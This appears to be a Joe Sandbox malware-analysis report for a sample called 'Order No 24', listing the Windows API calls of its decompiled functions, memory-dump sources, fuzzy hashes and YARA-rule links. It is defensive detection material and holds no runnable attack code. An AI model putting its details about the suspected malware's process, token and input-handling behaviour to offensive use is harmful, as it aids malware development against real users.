                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009C05AC
                                                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009C05C7
                                                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009C05DD
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 009C0632
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3137044355-0
                                                                                                                                  • Opcode ID: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                                                                                                                  • Instruction ID: ba932f8cc20bdafa941f3ef42bc826610440d553843c69902535de92f71a3bb8
                                                                                                                                  • Opcode Fuzzy Hash: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                                                                                                                  • Instruction Fuzzy Hash: A8215E71D00209EBDB20CFD1DD88FDABBB8EB80700F008A6DA516A6050D774EA559B62
                                                                                                                                  Function 009C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009C6733
                                                                                                                                  • _memset.LIBCMT ref: 009C6754
                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009C67A6
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C67AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1157408455-0
                                                                                                                                  • Opcode ID: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                                                                                                                  • Instruction ID: 4013db09a9df87430387817978941da04c46117edbb79506772bf77248095547
                                                                                                                                  • Opcode Fuzzy Hash: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                                                                                                                  • Instruction Fuzzy Hash: 7A11E372D012287AE7209BA5AC4DFABBABCEF44724F10469AF504E71C0D2744E818BB5
                                                                                                                                  Function 009BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                                                                                                                    • Part of subcall function 009BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                                                                                                                    • Part of subcall function 009BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                                                                                                                    • Part of subcall function 009BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                                                                                                                    • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,009BADE4,?,?), ref: 009BB21B
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009BB227
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009BB22E
                                                                                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 009BB247
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4217664535-0
                                                                                                                                  • Opcode ID: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                                                                                                                  • Instruction ID: 8cdd09c6e6e012db11b183c998d656e87e3717b79f065d400ba41f2995106d39
                                                                                                                                  • Opcode Fuzzy Hash: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                                                                                                                  • Instruction Fuzzy Hash: 9611C172A00209EFCB04DF98DE85AEEB7BDEF94324F14842DE95297250D771AE45CB10
                                                                                                                                  Function 009BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 009BB498
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4AA
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4C0
                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                  • Opcode ID: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                                                                                                                  • Instruction ID: 394e054c74d0dcd5cc4b2817aad2b0ac95cf61a3d9bb344deb98a1337eaf2cd0
                                                                                                                                  • Opcode Fuzzy Hash: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                                                                                                                  • Instruction Fuzzy Hash: BA11487A900218FFDB11DFA8C981EDDBBB9FB08710F204091E604B7290D771AE11DB94
                                                                                                                                  Function 0099B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 009FE69A
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009FE6A4
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009FE6AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4127811313-0
                                                                                                                                  • Opcode ID: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                                                                                                                  • Instruction ID: 8d5bd707d78c8beade0e9fcd8ef7a241bb451f7eea54f7da34948f984c3f9ed7
                                                                                                                                  • Opcode Fuzzy Hash: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                                                                                                                  • Instruction Fuzzy Hash: 5F11363690002EBFCF10DF98DD459AE77B9EF49305F410455F905E7150D738AA92CBA2
                                                                                                                                  Function 009C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009C7352
                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 009C7385
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009C739B
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009C73A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2880819207-0
                                                                                                                                  • Opcode ID: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                                                                                                                  • Instruction ID: b8889ea6bad486451a87a50d5b30f80cb7f738273f1ec77adf355ee69ba3ddd0
                                                                                                                                  • Opcode Fuzzy Hash: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                                                                                                                  • Instruction Fuzzy Hash: 2511E577A04258BBCB01DBE89C05FDEBBAD9B85324F044319F821D3291D6B189029FA1
                                                                                                                                  Function 0099D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 0099D1CE
                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3970641297-0
                                                                                                                                  • Opcode ID: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                                                                                                                  • Instruction ID: f2a2682d316aacb568e5340bac4da6a9c1d8c107f10af0a273b79beb82ab45f2
                                                                                                                                  • Opcode Fuzzy Hash: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                                                                                                                  • Instruction Fuzzy Hash: 0B118B7310650DBFEF268FD89C90EEABB6EFF19364F040105FA1552060C7329C629BA0
                                                                                                                                  Function 009B4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                  • Instruction ID: a72d1a3ea0da921459526e574d5be0e0d00c2c308c89878973b0116e6701262f
                                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                  • Instruction Fuzzy Hash: 9A01493200014EBBCF125E84DE059EE3F67BB58360B598455FE2859132D336DAB2BB81
                                                                                                                                  Function 009A7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009A7A0D: __getptd_noexit.LIBCMT ref: 009A7A0E
                                                                                                                                  • __lock.LIBCMT ref: 009A748F
                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 009A74AC
                                                                                                                                  • _free.LIBCMT ref: 009A74BF
                                                                                                                                  • InterlockedIncrement.KERNEL32(01014598), ref: 009A74D7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2704283638-0
                                                                                                                                  • Opcode ID: 8005cf0778333b90c16e0f33bbd7e2cbe6e01c14fe831d27eb3b214f68419b88
                                                                                                                                  • Instruction ID: e74b2aaa14292035a67d110b9218181065f38d888ae4fa3db5ad606e5371216c
                                                                                                                                  • Opcode Fuzzy Hash: 8005cf0778333b90c16e0f33bbd7e2cbe6e01c14fe831d27eb3b214f68419b88
                                                                                                                                  • Instruction Fuzzy Hash: F901D232909A21ABC712EFE59C0B75DFBB5BF4A721F148019F854A76A0CB345902CFD2
                                                                                                                                  Function 009A7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 009A7AD8
                                                                                                                                    • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                                                                                                                    • Part of subcall function 009A7CF4: EnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                                                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 009A7AE5
                                                                                                                                  • __lock.LIBCMT ref: 009A7AF9
                                                                                                                                  • ___addlocaleref.LIBCMT ref: 009A7B17
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1687444384-0
                                                                                                                                  • Opcode ID: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                                                                                                                  • Instruction ID: 2060e8d4f53595837c6f27dafcf16c8d905e1a0f476c30ec6d910970e583995f
                                                                                                                                  • Opcode Fuzzy Hash: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                                                                                                                  • Instruction Fuzzy Hash: 1F011B72504B00AED721DFA5D90674AF7F0AF91325F20890EA49A966A0CB74A645CB91
                                                                                                                                  Function 009EE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009EE33D
                                                                                                                                  • _memset.LIBCMT ref: 009EE34C
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                                                                                                                  • CloseHandle.KERNEL32 ref: 009EE38D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                  • Opcode ID: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                                                                                                                  • Instruction ID: 4c8282847733270231fab82f021306d46b8531493b6c60fe1e2a371028820925
                                                                                                                                  • Opcode Fuzzy Hash: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                                                                                                                  • Instruction Fuzzy Hash: 70F089FB9403047EE71097E5AC45F777E6CD745758F104821FE04D61A2D3765D1146A4
                                                                                                                                  Function 009EEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                                                                                                                    • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEA8E
                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 009EEA9B
                                                                                                                                  • EndPath.GDI32(00000000), ref: 009EEAAB
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 009EEAB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                  • Opcode ID: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                                                                                                                  • Instruction ID: ce6c54057da6545b9c731c934fd032dabd1ef74562250ddaabe3c31802f660dd
                                                                                                                                  • Opcode Fuzzy Hash: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                                                                                                                  • Instruction Fuzzy Hash: 68F05E36005259BBDB12DFD4AD09FCA3F19AF06311F044201FE16610E187759563CBD5
                                                                                                                                  Function 009BC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009BC864
                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 009BC86B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                  • Opcode ID: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                                                                                                                  • Instruction ID: fa39a212f6e343e6303ca2b49bb08acb959305949c7853e68f49bb64065d0cee
                                                                                                                                  • Opcode Fuzzy Hash: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                                                                                                                  • Instruction Fuzzy Hash: 1BE0657254122876DB109FE1DC0DEDB7F2CEF057B1F008011B50D85450D672C582C7E0
                                                                                                                                  Function 009BB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 009BB0D6
                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0DD
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009BAC9D), ref: 009BB0EA
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
